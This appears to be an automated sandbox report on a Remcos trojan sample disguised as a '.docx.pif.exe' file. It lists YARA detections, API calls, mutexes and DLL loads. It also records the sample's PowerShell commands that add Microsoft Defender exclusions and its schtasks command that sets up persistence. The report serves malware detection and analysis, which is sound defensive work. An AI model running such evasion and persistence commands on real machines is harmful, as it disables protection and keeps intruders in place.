Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe PID: 3628, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: TkdxROLUOVpK.exe PID: 2892, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: vbc.exe PID: 5456, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TkdxROLUOVpK.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, YL2q2YAVtmpvhXuwY3.cs	Security API names: _0020.SetAccessControl
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, YL2q2YAVtmpvhXuwY3.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, YL2q2YAVtmpvhXuwY3.cs	Security API names: _0020.AddAccessRule
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, YL2q2YAVtmpvhXuwY3.cs	Security API names: _0020.SetAccessControl
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, YL2q2YAVtmpvhXuwY3.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, YL2q2YAVtmpvhXuwY3.cs	Security API names: _0020.AddAccessRule
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, PenYE0tkOYCLDqwRMy.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, YL2q2YAVtmpvhXuwY3.cs	Security API names: _0020.SetAccessControl
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, YL2q2YAVtmpvhXuwY3.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, YL2q2YAVtmpvhXuwY3.cs	Security API names: _0020.AddAccessRule
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, PenYE0tkOYCLDqwRMy.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, YL2q2YAVtmpvhXuwY3.cs	Security API names: _0020.SetAccessControl
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, YL2q2YAVtmpvhXuwY3.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, YL2q2YAVtmpvhXuwY3.cs	Security API names: _0020.AddAccessRule
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, PenYE0tkOYCLDqwRMy.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, PenYE0tkOYCLDqwRMy.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@21/16@51/0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

15_2_00417952

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

15_2_0040F474

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,

15_2_0041B4A8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

15_2_0041AA4A

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe

File created: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-5MRRQ3
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4672:120:WilError_03
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4832:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_03
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Mutant created: \Sessions\1\BaseNamedObjects\GZHBuduAufzLXXIAj

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe

File created: C:\Users\user\AppData\Local\Temp\tmpBE91.tmp

Jump to behavior

Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe	ReversingLabs: Detection: 65%
Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Virustotal: Detection: 60%

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe

File read: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe"
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE91.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpCDF3.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe"	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe"	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE91.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpCDF3.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"	Jump to behavior

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
